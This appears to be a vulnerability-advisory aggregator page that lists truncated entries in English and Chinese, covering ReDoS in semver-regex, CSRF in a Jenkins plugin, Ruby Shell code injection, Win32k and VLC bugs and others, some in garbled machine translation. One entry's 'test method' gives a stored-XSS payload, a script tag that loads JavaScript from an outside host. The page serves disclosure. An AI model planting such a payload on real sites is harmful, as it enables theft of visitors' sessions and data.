EUVD-2022-5926

Malicious code in bioql PyPI...

GHSA-4X5V-GMQ8-25CH Regular expression denial of service in semver-regex

An exponential ReDoS Regular Expression Denial of Service can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

CVE-2021-43307

An exponential ReDoS Regular Expression Denial of Service can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

CVE-2021-43307 Exponential ReDoS in semver-regex

An exponential ReDoS Regular Expression Denial of Service can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test method...

PT-2022-11819 · Npm · Semver-Regex

Name of the Vulnerable Software and Affected Versions: semver-regex affected versions not specified Description: An exponential ReDoS Regular Expression Denial of Service can be triggered in the semver-regex npm package when an attacker supplies arbitrary input to the test method. Recommendations...

CSRF vulnerability in Jenkins Xray - Test Management for Jira Plugin allows capturing credentials

Jenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not require POST requests for a connection test method, resulting in a cross-site request forgery CSRF vulnerability. This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified...

CVE-2019-16255

Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows code injection if the first argument aka the "command" argument to Shell or Shelltest in lib/shell.rb is untrusted data. An attacker can exploit this to call an arbitrary Ruby method...

Google found Windows 8.1 0day vulnerabilities and published vulnerabilities verify program PoC-the exploit-warning-the black bar safety net

Google security researcher found a Windows 8.1 privilege escalation vulnerability, the attacker can use the vulnerability to modify the system content and even completely control the victim computer. Currently Google has announced a vulnerability in the authentication program, the PoC Airport. Po...

PHP Address Book 7.0.0 plurality of defect and repair-vulnerability warning-the black bar safety net

Title: PHP Address Book 7.0.0 Multiple security vulnerabilities Author: Stefan Schurtz Affected Software: Successfully tested on PHP Address Book 7.0.0 Developer website: http://sourceforge.net/projects/php-addressbook/ Defect description PHP Address Book 7.0.0 containing multiple XSS and SQLi...

VLC Media Player除零拒绝服务漏洞

BUGTRAQ ID: 53169 VLC Media Player是多媒体播放器（最初命名为VideoLAN客户端）是VideoLAN计划的多媒体播放器。 VLC Media Player在处理畸形.mp4文件时，在实现上存在拒绝服务漏洞，攻击者可利用此漏洞使受影响应用崩溃。 0 VLC Media Player 2.0.1 厂商补丁： VideoLAN -------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.videolan.org/ Senator （）提供了如下测试方法： Data =...

Microsoft Windows Kernel "Win32k.sys"键盘布局本地权限提升漏洞

BUGTRAQ ID: 50763 Microsoft Windows是流行的计算机操作系统。 Win32k.sys在实现上存在索引错误，在加载键盘布局文件时，本地攻击者可通过访问无效内存位置，利用此漏洞以内核权限执行任意代码，完全控制受影响计算机 Microsoft Windows XP Microsoft Windows 7 厂商补丁： Microsoft --------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.microsoft.com/windowsxp/default.asp instruder...

Trend Micro WebReputation API URI安全限制绕过漏洞

BUGTRAQ ID: 46864 Trend Micro WebReputation API是趋势科技网页声誉应用程序界面。 Trend Micro WebReputation API在实现上存在安全限制绕过漏洞，远程攻击者可利用此漏洞绕过下载机制中包含的过滤程序，下载恶意文件到受影响计算机。 Trend Micro WebReputation API 10.5 Trend Micro WebReputation API 0 厂商补丁： Trend Micro ----------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

1 1 4. Site Navigation Station system of V1. 1 3 XSS cross-site attacks-vulnerability warning-the black bar safety net

url-submit/index. php to submit the data is not filtered directly into the database,resulting in a savings ofXSSvulnerability Test method: In the Site Name column fill in thescript src=http://www. hackqing. cn/qingexp. js/script（src is fill in your own js file for the address,don't tell me that t...

Serv-U FTP Server v8 local mention right-vulnerability warning-the black bar safety net

Author: the emptiness of the prodigal son heart Release date:2009-08-05 Updated date:2009-08-05 Affected systems: serv-u8 Not affected system: Other versions are not affected Description: See cnbeta found su 8 This version. Think before write a 7 local mention right. Don't know 8 what the securit...

BBSGood. Speed Version 4.0 injection vulnerability-vulnerability warning-the black bar safety net

| Version: BBSGood. Speed Version 4.0 Vulnerability file: The UserInfo. asp Vulnerability description: Variable Blogurl unfiltered into an sql statement, leading toSql injectionvulnerability --- Code example: Line 1 7 2 9-1 8 5 3. | case 1 4 if Request. QueryString"save"=1 then if trimRequest...

Internet Download Manager language file parsing stack overflow vulnerability-vulnerability warning-the black bar safety net

Affects versions: Tonec Inc Internet Download Manager 5.15 Build 3 Test method: PoC Internet Download Manager v. 5. 1 5 Build 3 4 In December Works on Vista HellCode Labs || TCC Group || http://tcc.hellcode.net The Bug was found by "musashi" aka karak0rsan [email protected] thanx to murderkey...

PHPWIND & DISCUZ! CSRF vulnerability-vulnerability warning-the black bar safety net

PHPWIND & DISCUZ! CSRF vulnerability affects versions: Discuz! 6.0.0 & 6.1.0 & 7.0.0 PHPWIND 6.0 & 6.3 & 7.0 Vulnerability description: PHPWIND & DISCUZ! The presence of CSRF vulnerabilities, triggering PHPWIND & DISCUZ! CSRF WORM! ... d/b31e4d2e6270c384 reference ... d/b31e4d2e6270c384 Safety...

Verity's Search 97查看任意文件漏洞

BUGTRAQ: 162 Verity's Search97是Verity公司搜索引擎的Web访问界面。 Verity's Search97的search97.vts脚本未对用户如入做充分过滤，远程攻击者可能利用此漏洞进行目录遍历攻击，导致系统文件泄漏。 软件包中的search97.vts对用户输入的“..”未做充分过滤，攻击者可能通过构造特殊的请求来读取任何服务器上任何Web服务进程有读权限的文件。 2.1 临时解决方法： 如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁： 暂时停止使用该软件。 厂商补丁： Verity ------...

AdamIsmayPrintTopicModSQL注入漏洞 Exploit

No description provided by source. Bartek Nowotarski （[email protected]）提供了如下测试方法：...